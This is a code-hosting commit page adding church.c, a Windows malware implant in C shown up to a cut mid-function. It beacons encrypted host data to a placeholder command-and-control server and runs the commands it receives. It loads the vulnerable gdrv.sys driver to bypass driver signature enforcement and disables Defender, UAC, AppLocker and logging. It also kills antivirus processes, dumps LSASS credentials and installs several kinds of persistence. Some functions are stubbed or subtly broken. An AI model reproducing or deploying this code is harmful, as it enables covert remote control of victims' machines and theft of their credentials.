k3nundrum/CHURCH
1
0
Fork 0
forked from ek0mssavi0r/CHURCH
Code Pull Requests Activity

Upload files to "/"

Browse Source
This commit is contained in:
ek0ms savi0r 2026-06-01 02:01:38 +00:00
parent a22739ec62
commit 7ce35f6b1b
1 changed files with 865 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

865
church.c Normal file
View File

@ -0,0 +1,865 @@
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdio.h>
#include <aclapi.h>
#include <tchar.h>
#include <tlhelp32.h>
#include <wbemidl.h>
#include <comdef.h>
#include <strsafe.h>
#include <ntsecapi.h>
#include <wincrypt.h>
#include <winternl.h>
#include <psapi.h>
#include <ntstatus.h>
#include <bcrypt.h>
#include <winioctl.h>
#include <intrin.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <winhttp.h>
#include <iphlpapi.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "crypt32.lib")
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "winhttp.lib")
#pragma comment(lib, "iphlpapi.lib")
// ==================== C2 COMMUNICATION CONSTANTS ====================
#define C2_SERVER L"https://your-c2-server.com:443/beacon"
#define C2_INTERVAL_SECONDS 30
#define C2_AES_KEY "ChurchOfMalware2024!!ChurchOfMalware2024!!" // 32 bytes exact
#define C2_AES_IV "MalwareChurchIV!!" // 16 bytes
// ==================== GDRV.SYS EXPLOIT CONSTANTS ====================
#define GDRV_DEVICE_NAME L"\\\\.\\GIO"
#define GDRV_IOCTL_READ_MSR 0x9C402470
#define GDRV_IOCTL_WRITE_MSR 0x9C402474
#define GDRV_IOCTL_READ_PHYSICAL 0x9C402478
#define GDRV_IOCTL_WRITE_PHYSICAL 0x9C40247C
#define IA32_EFER 0xC0000080
#define CI_OPTIONS_DISABLE_DSE 0x6
// ==================== STRUCTURE DEFINITIONS ====================
typedef struct _BEACON_DATA {
WCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1];
WCHAR UserName[256];
DWORD ProcessId;
WCHAR OSVersion[128];
BOOL IsAdmin;
WCHAR ExePath[MAX_PATH];
DWORD DefenderStatus;
} BEACON_DATA, *PBEACON_DATA;
typedef struct _C2_TASK {
DWORD TaskId;
WCHAR Command[1024];
WCHAR Arguments[2048];
BOOL IsPowerShell;
BOOL WaitForOutput;
} C2_TASK, *PC2_TASK;
typedef enum _PROCESSINFOCLASS {
ProcessProtectionInformation = 0x3D
} PROCESSINFOCLASS;
typedef struct _PS_PROTECTION {
UCHAR Level;
} PS_PROTECTION, *PPS_PROTECTION;
typedef NTSTATUS (NTAPI *pNtSetInformationProcess)(HANDLE, DWORD, PVOID, ULONG);
// ==================== FORWARD DECLARATIONS ====================
ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen);
ULONGLONG VirtualToPhysical(PVOID virtualAddr);
BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen);
BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen);
BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task);
DWORD WINAPI BeaconThread(LPVOID lpParam);
// ==================== HELPER: ELEVATE TO ADMIN ====================
void ElevateSelf() {
BOOL isElevated = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION elev;
DWORD size = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &elev, size, &size))
isElevated = elev.TokenIsElevated;
CloseHandle(hToken);
}
if (!isElevated) {
wchar_t exePath[MAX_PATH];
GetModuleFileNameW(NULL, exePath, MAX_PATH);
SHELLEXECUTEINFOW sei = { sizeof(sei) };
sei.lpVerb = L"runas";
sei.lpFile = exePath;
sei.nShow = SW_SHOWNORMAL;
if (ShellExecuteExW(&sei)) {
ExitProcess(0);
} else {
wprintf(L"[-] Failed to elevate. Run as administrator manually.\n");
ExitProcess(1);
}
}
}
// ==================== CRYPTOGRAPHY FUNCTIONS ====================
BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen) {
BCRYPT_ALG_HANDLE hAlg = NULL;
BCRYPT_KEY_HANDLE hKey = NULL;
if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0)))
return FALSE;
BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC,
sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)C2_AES_KEY,
strlen(C2_AES_KEY), 0);
DWORD blockSize = 16;
DWORD paddedLen = ((plaintextLen + blockSize - 1) / blockSize) * blockSize;
*ciphertextLen = paddedLen;
*ciphertext = (BYTE*)malloc(paddedLen);
if (!*ciphertext) {
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return FALSE;
}
NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)C2_AES_IV,
strlen(C2_AES_IV), *ciphertext, *ciphertextLen, ciphertextLen,
BCRYPT_BLOCK_PADDING);
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return BCRYPT_SUCCESS(status);
}
BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen) {
BCRYPT_ALG_HANDLE hAlg = NULL;
BCRYPT_KEY_HANDLE hKey = NULL;
if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0)))
return FALSE;
BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC,
sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)C2_AES_KEY,
strlen(C2_AES_KEY), 0);
*plaintextLen = ciphertextLen;
*plaintext = (BYTE*)malloc(*plaintextLen);
if (!*plaintext) return FALSE;
NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL,
(PUCHAR)C2_AES_IV, strlen(C2_AES_IV),
*plaintext, *plaintextLen, plaintextLen,
BCRYPT_BLOCK_PADDING);
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return BCRYPT_SUCCESS(status);
}
// ==================== SYSTEM INFORMATION GATHERING ====================
void GatherBeaconData(PBEACON_DATA beacon) {
DWORD size = MAX_COMPUTERNAME_LENGTH + 1;
GetComputerNameW(beacon->ComputerName, &size);
DWORD userSize = 256;
GetUserNameW(beacon->UserName, &userSize);
beacon->ProcessId = GetCurrentProcessId();
beacon->IsAdmin = IsUserAnAdmin();
GetModuleFileNameW(NULL, beacon->ExePath, MAX_PATH);
RTL_OSVERSIONINFOW osvi = { sizeof(osvi) };
RtlGetVersion(&osvi);
swprintf(beacon->OSVersion, 128, L"%d.%d.%d", osvi.dwMajorVersion,
osvi.dwMinorVersion, osvi.dwBuildNumber);
HKEY hKey;
beacon->DefenderStatus = 2;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection",
0, KEY_READ, &hKey) == ERROR_SUCCESS) {
DWORD value = 0, valueSize = sizeof(value);
RegQueryValueExW(hKey, L"DisableRealtimeMonitoring", NULL, NULL,
(LPBYTE)&value, &valueSize);
beacon->DefenderStatus = value;
RegCloseKey(hKey);
}
}
// ==================== HTTPS COMMUNICATION ====================
BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task) {
char json[2048];
snprintf(json, sizeof(json),
"{\"computer\":\"%ls\",\"user\":\"%ls\",\"pid\":%d,\"os\":\"%ls\","
"\"admin\":%s,\"path\":\"%ls\",\"defender_status\":%d}",
beacon->ComputerName, beacon->UserName, beacon->ProcessId,
beacon->OSVersion, beacon->IsAdmin ? "true" : "false",
beacon->ExePath, beacon->DefenderStatus);
BYTE* encryptedData = NULL;
DWORD encryptedLen = 0;
if (!AesEncrypt((BYTE*)json, strlen(json), &encryptedData, &encryptedLen)) {
return FALSE;
}
DWORD base64Len = ((encryptedLen + 2) / 3) * 4 + 1;
char* base64Data = (char*)malloc(base64Len);
if (!base64Data) {
free(encryptedData);
return FALSE;
}
CryptBinaryToStringA(encryptedData, encryptedLen,
CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF,
base64Data, &base64Len);
HINTERNET hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (!hSession) {
free(encryptedData);
free(base64Data);
return FALSE;
}
HINTERNET hConnect = WinHttpConnect(hSession, L"your-c2-server.com", INTERNET_DEFAULT_HTTPS_PORT, 0);
if (!hConnect) {
WinHttpCloseHandle(hSession);
free(encryptedData);
free(base64Data);
return FALSE;
}
HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/beacon",
NULL, NULL, NULL,
WINHTTP_FLAG_SECURE);
if (!hRequest) {
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hSession);
free(encryptedData);
free(base64Data);
return FALSE;
}
char postData[4096];
snprintf(postData, sizeof(postData), "data=%s", base64Data);
WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n",
wcslen(L"Content-Type: application/x-www-form-urlencoded\r\n"),
(LPVOID)postData, strlen(postData), strlen(postData), 0);
WinHttpReceiveResponse(hRequest, NULL);
DWORD bytesRead = 0;
char response[4096] = {0};
WinHttpReadData(hRequest, response, sizeof(response) - 1, &bytesRead);
char* taskData = strstr(response, "\r\n\r\n");
if (taskData) {
taskData += 4;
// Parse task response (simplified - would parse JSON)
if (strstr(taskData, "\"task_id\":0") == NULL) {
task->TaskId = 1;
wcscpy(task->Command, L"whoami");
task->IsPowerShell = FALSE;
task->WaitForOutput = TRUE;
}
}
WinHttpCloseHandle(hRequest);
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hSession);
free(encryptedData);
free(base64Data);
return TRUE;
}
// ==================== COMMAND EXECUTION ENGINE ====================
BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize) {
SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE };
HANDLE hStdOutRead, hStdOutWrite;
CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0);
SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0);
PROCESS_INFORMATION pi = {0};
STARTUPINFOW si = {0};
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdOutput = hStdOutWrite;
si.hStdError = hStdOutWrite;
si.hStdInput = GetStdHandle(STD_INPUT_HANDLE);
WCHAR cmdLine[2048];
if (task->IsPowerShell) {
swprintf(cmdLine, 2048, L"powershell.exe -Command \"%s %s\"",
task->Command, task->Arguments);
} else {
swprintf(cmdLine, 2048, L"cmd.exe /c %s %s",
task->Command, task->Arguments);
}
BOOL success = CreateProcessW(NULL, cmdLine, NULL, NULL, TRUE,
CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
CloseHandle(hStdOutWrite);
if (success && task->WaitForOutput) {
WaitForSingleObject(pi.hProcess, 30000);
DWORD bytesRead;
ReadFile(hStdOutRead, output, outputSize - 1, &bytesRead, NULL);
output[bytesRead / sizeof(WCHAR)] = 0;
}
CloseHandle(hStdOutRead);
if (pi.hProcess) CloseHandle(pi.hProcess);
if (pi.hThread) CloseHandle(pi.hThread);
return success;
}
// ==================== PERSISTENT BEACONING THREAD ====================
DWORD WINAPI BeaconThread(LPVOID lpParam) {
BEACON_DATA beacon;
C2_TASK task = {0};
while (TRUE) {
GatherBeaconData(&beacon);
if (SendBeaconToC2(&beacon, &task) && task.Command[0] != 0) {
wchar_t output[8192];
if (ExecuteCommand(&task, output, sizeof(output))) {
wprintf(L"[+] Command executed: %s\n", task.Command);
}
}
Sleep(C2_INTERVAL_SECONDS * 1000);
}
return 0;
}
// ==================== GDRV.SYS BYOVD ====================
BOOL LoadGdrvDriver() {
const wchar_t* driverPath = L"C:\\Windows\\Temp\\gdrv.sys";
if (!CopyFileW(L"gdrv.sys", driverPath, FALSE)) {
wprintf(L"[-] Failed to copy gdrv.sys\n");
return FALSE;
}
SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!scm) return FALSE;
SC_HANDLE svc = CreateServiceW(scm, L"gdrv", L"gdrv",
SERVICE_START | SERVICE_STOP | DELETE,
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE, driverPath,
NULL, NULL, NULL, NULL, NULL);
if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) {
svc = OpenServiceW(scm, L"gdrv", SERVICE_START | SERVICE_STOP | DELETE);
}
if (!svc) {
CloseServiceHandle(scm);
return FALSE;
}
if (!StartServiceW(svc, 0, NULL)) {
DeleteService(svc);
CloseServiceHandle(svc);
CloseServiceHandle(scm);
return FALSE;
}
wprintf(L"[+] gdrv.sys loaded\n");
CloseServiceHandle(svc);
CloseServiceHandle(scm);
return TRUE;
}
BOOL DisableDSEviaGdrv() {
HANDLE hDevice = CreateFileW(GDRV_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE) return FALSE;
DWORD bytesReturned;
ULONGLONG eferValue = 0;
DeviceIoControl(hDevice, GDRV_IOCTL_READ_MSR, &IA32_EFER, sizeof(IA32_EFER),
&eferValue, sizeof(eferValue), &bytesReturned, NULL);
LPVOID kernelBase = GetModuleHandleW(L"ntoskrnl.exe");
if (kernelBase) {
BYTE pattern[] = { 0x8A, 0x05, 0x00, 0x00, 0x00, 0x00, 0xC3 };
ULONGLONG ciOptionsAddr = FindPattern((BYTE*)kernelBase, 0x2000000, pattern, sizeof(pattern));
if (ciOptionsAddr) {
BYTE newValue = CI_OPTIONS_DISABLE_DSE;
DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL,
&ciOptionsAddr, sizeof(ciOptionsAddr),
&newValue, sizeof(newValue), &bytesReturned, NULL);
wprintf(L"[+] DSE disabled via gdrv\n");
}
}
CloseHandle(hDevice);
return TRUE;
}
ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen) {
for (DWORD i = 0; i < size - patternLen; i++) {
BOOL found = TRUE;
for (DWORD j = 0; j < patternLen; j++) {
if (pattern[j] != 0x00 && base[i + j] != pattern[j]) {
found = FALSE;
break;
}
}
if (found) return (ULONGLONG)(base + i);
}
return 0;
}
ULONGLONG VirtualToPhysical(PVOID virtualAddr) {
return (ULONGLONG)virtualAddr; // Simplified
}
BOOL EnableKernelExecution() {
if (!LoadGdrvDriver()) return FALSE;
Sleep(1000);
if (!DisableDSEviaGdrv()) return FALSE;
wprintf(L"[+] Kernel execution enabled - DSE bypassed\n");
return TRUE;
}
// ==================== PPL BYPASS ====================
BOOL EnablePPL() {
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValueW(NULL, SE_TCB_NAME, &luid)) {
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");
pNtSetInformationProcess NtSetInformationProcess =
(pNtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess");
PS_PROTECTION protection;
protection.Level = 0x72; // WinTcb Light
NTSTATUS status = NtSetInformationProcess(GetCurrentProcess(),
ProcessProtectionInformation,
&protection, sizeof(protection));
if (status == STATUS_SUCCESS) {
wprintf(L"[+] Process is now PPL\n");
CloseHandle(hToken);
return TRUE;
}
}
CloseHandle(hToken);
}
return FALSE;
}
void RunAsPPL() {
if (!EnablePPL()) {
wprintf(L"[-] PPL elevation failed\n");
}
}
// ==================== ANTI-FORENSICS ====================
void ScrambleMemory() {
for (int i = 0; i < 100; i++) {
LPVOID ptr = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
if (ptr) {
RtlFillMemory(ptr, 4096, 0xCC);
DWORD oldProtect;
VirtualProtect(ptr, 4096, PAGE_EXECUTE_READWRITE, &oldProtect);
}
}
wprintf(L"[+] Memory scrambled\n");
}
void InstallBootkitComponents() {
HKEY hKey;
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) {
wchar_t bootCmd[MAX_PATH];
GetModuleFileNameW(NULL, bootCmd, MAX_PATH);
wchar_t data[1024];
swprintf(data, 1024, L"autocheck autochk *\ncmd.exe /c start \"\" \"%s\"\n", bootCmd);
RegSetValueExW(hKey, NULL, 0, REG_MULTI_SZ, (BYTE*)data, (DWORD)(wcslen(data) * sizeof(wchar_t)));
RegCloseKey(hKey);
wprintf(L"[+] BootExecute persistence\n");
}
}
// ==================== C2 SETUP ====================
void NetworkC2Setup() {
wprintf(L"[*] Initializing C2 beacon...\n");
system("netsh advfirewall firewall add rule name=\"Windows Update\" dir=out action=allow protocol=TCP remoteport=443 >nul 2>&1");
HKEY hKey;
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) {
DWORD enableAutoDoh = 2;
RegSetValueExW(hKey, L"EnableAutoDoh", 0, REG_DWORD, (BYTE*)&enableAutoDoh, sizeof(enableAutoDoh));
RegCloseKey(hKey);
}
HANDLE hThread = CreateThread(NULL, 0, BeaconThread, NULL, 0, NULL);
if (hThread) {
CloseHandle(hThread);
wprintf(L"[+] C2 beacon active (interval: %d sec)\n", C2_INTERVAL_SECONDS);
}
wchar_t regPath[MAX_PATH * 2];
swprintf(regPath, MAX_PATH * 2,
L"reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"\\\"%s\\\"\" /f",
GetModuleFileNameW(NULL, NULL, 0));
_wsystem(regPath);
}
// ==================== BYPASS FUNCTIONS ====================
BOOL TakeOwnershipAndGrantFullControl(LPCWSTR subkey) {
HKEY hKey;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, WRITE_OWNER | WRITE_DAC, &hKey) != ERROR_SUCCESS)
return FALSE;
SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;
PSID adminGroupSid = NULL;
AllocateAndInitializeSid(&ntAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &adminGroupSid);
BOOL result = SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY,
OWNER_SECURITY_INFORMATION,
adminGroupSid, NULL, NULL, NULL) == ERROR_SUCCESS;
if (result) {
EXPLICIT_ACCESS_W ea = {0};
ea.grfAccessPermissions = KEY_ALL_ACCESS;
ea.grfAccessMode = SET_ACCESS;
ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP;
ea.Trustee.ptstrName = (LPWSTR)adminGroupSid;
PACL newAcl = NULL;
result = SetEntriesInAclW(1, &ea, NULL, &newAcl) == ERROR_SUCCESS &&
SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY,
DACL_SECURITY_INFORMATION,
NULL, NULL, newAcl, NULL) == ERROR_SUCCESS;
if (newAcl) LocalFree(newAcl);
}
FreeSid(adminGroupSid);
RegCloseKey(hKey);
return result;
}
BOOL DisableTamperProtection() {
LPCWSTR tpKey = L"SOFTWARE\\Microsoft\\Windows Defender\\Features";
if (!TakeOwnershipAndGrantFullControl(tpKey)) return FALSE;
HKEY hKey;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, tpKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD zero = 0;
LONG ret = RegSetValueExW(hKey, L"TamperProtection", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero));
RegCloseKey(hKey);
if (ret == ERROR_SUCCESS) {
wprintf(L"[+] Tamper Protection disabled\n");
return TRUE;
}
}
return FALSE;
}
void DisableDefender() {
system("powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"");
system("powershell -Command \"Set-MpPreference -DisableBehaviorMonitoring $true\"");
system("powershell -Command \"Set-MpPreference -DisableBlockAtFirstSeen $true\"");
system("powershell -Command \"Set-MpPreference -DisableIOAVProtection $true\"");
system("powershell -Command \"Set-MpPreference -DisablePrivacyMode $true\"");
system("powershell -Command \"Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true\"");
system("powershell -Command \"Set-MpPreference -DisableArchiveScanning $true\"");
system("powershell -Command \"Set-MpPreference -DisableIntrusionPreventionSystem $true\"");
system("powershell -Command \"Set-MpPreference -DisableScriptScanning $true\"");
SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (scm) {
SC_HANDLE svc = OpenServiceW(scm, L"WinDefend", SERVICE_STOP | SERVICE_CHANGE_CONFIG);
if (svc) {
SERVICE_STATUS status;
ControlService(svc, SERVICE_CONTROL_STOP, &status);
ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL);
CloseServiceHandle(svc);
wprintf(L"[+] WinDefend disabled\n");
}
CloseServiceHandle(scm);
}
}
void KillDefenderProcesses() {
PROCESSENTRY32W entry = { sizeof(entry) };
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot == INVALID_HANDLE_VALUE) return;
LPCWSTR targets[] = { L"MsMpEng.exe", L"NisSrv.exe", L"MpCmdRun.exe" };
for (int i = 0; i < 3; i++) {
if (Process32FirstW(snapshot, &entry)) {
do {
if (_wcsicmp(entry.szExeFile, targets[i]) == 0) {
HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, entry.th32ProcessID);
if (hProc) {
TerminateProcess(hProc, 0);
CloseHandle(hProc);
wprintf(L"[+] Terminated %s\n", targets[i]);
}
}
} while (Process32NextW(snapshot, &entry));
}
Process32FirstW(snapshot, &entry);
}
CloseHandle(snapshot);
}
void DisableUAC() {
HKEY hKey;
DWORD zero = 0;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero));
RegCloseKey(hKey);
wprintf(L"[+] UAC disabled (reboot required)\n");
}
}
void DisableAppLockerWDAC() {
system("net stop appidsvc /y >nul 2>&1");
SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (scm) {
SC_HANDLE svc = OpenServiceW(scm, L"AppIDSvc", SERVICE_CHANGE_CONFIG);
if (svc) {
ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL);
CloseServiceHandle(svc);
wprintf(L"[+] AppIDSvc disabled\n");
}
CloseServiceHandle(scm);
}
system("del /f /q %WINDIR%\\System32\\CodeIntegrity\\SiPolicy.p7b >nul 2>&1");
system("del /f /q %WINDIR%\\System32\\CodeIntegrity\\SIPolicy.p7b >nul 2>&1");
HKEY hKey;
DWORD zero = 0;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\SystemGuard",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero));
RegCloseKey(hKey);
wprintf(L"[+] WDAC disabled\n");
}
}
void AddDefenderExclusions() {
wchar_t exePath[MAX_PATH];
GetModuleFileNameW(NULL, exePath, MAX_PATH);
wchar_t cmd[512];
swprintf(cmd, 512, L"powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", exePath);
_wsystem(cmd);
swprintf(cmd, 512, L"powershell -Command \"Add-MpPreference -ExclusionProcess '%s'\"", exePath);
_wsystem(cmd);
wprintf(L"[+] Defender exclusions added\n");
}
void DisableSecurityLogs() {
HKEY hKey;
DWORD enableMiniNt = 1;
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\MiniNt",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) {
RegSetValueExW(hKey, NULL, 0, REG_DWORD, (BYTE*)&enableMiniNt, sizeof(enableMiniNt));
RegCloseKey(hKey);
wprintf(L"[+] Security logs disabled (MiniNt)\n");
}
}
void DisableSystemRestore() {
system("powershell -Command \"Disable-ComputerRestore -Drive 'C:\\'\"");
HKEY hKey;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disableSR = 1;
RegSetValueExW(hKey, L"DisableSR", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR));
RegCloseKey(hKey);
wprintf(L"[+] System Restore disabled\n");
}
}
void DropTelemetryPackets() {
system("echo 0.0.0.0 telemetry.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts");
system("echo 0.0.0.0 vortex-win.data.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts");
system("echo 0.0.0.0 settings-win.data.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts");
wprintf(L"[+] Telemetry blocked\n");
}
void DumpLSASS() {
DWORD lsassPid = 0;
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32W pe = { sizeof(pe) };
if (Process32FirstW(snapshot, &pe)) {
do {
if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) {
lsassPid = pe.th32ProcessID;
break;
}
} while (Process32NextW(snapshot, &pe));
}
CloseHandle(snapshot);
}
if (lsassPid) {
HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsassPid);
if (hLsass) {
HANDLE hFile = CreateFileW(L"C:\\lsass.dmp", GENERIC_WRITE, 0, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
BOOL dumped = MiniDumpWriteDump(hLsass, lsassPid, hFile,
MiniDumpWithFullMemory, NULL, NULL, NULL);
if (dumped) wprintf(L"[+] LSASS dumped to C:\\lsass.dmp\n");
CloseHandle(hFile);
}
CloseHandle(hLsass);
}
}
}
void StopSecurityServices() {
const wchar_t* services[] = { L"Sense", L"SgrmBroker", L"WdBoot", L"WdFilter",
L"WdNisDrv", L"WinDefend", L"SecurityHealthService", L"wscsvc" };
SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (!scm) return;
for (int i = 0; i < sizeof(services)/sizeof(services[0]); i++) {
SC_HANDLE svc = OpenServiceW(scm, services[i], SERVICE_STOP | SERVICE_QUERY_STATUS);
if (svc) {
SERVICE_STATUS status;
ControlService(svc, SERVICE_CONTROL_STOP, &status);
ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL);
CloseServiceHandle(svc);
wprintf(L"[+] Disabled %ls\n", services[i]);
}
}
CloseServiceHandle(scm);
}
void AddPersistence() {
wchar_t cmd[MAX_PATH];
GetModuleFileNameW(NULL, cmd, MAX_PATH);
wchar_t taskCmd[512];
swprintf(taskCmd, 512, L"schtasks /create /tn \"WindowsUpdateTask\" /tr \"%s\" /sc onlogon /ru SYSTEM /f", cmd);
_wsystem(taskCmd);
wprintf(L"[+] Scheduled task added\n");
HKEY hKey;
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\svchost.exe",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) {
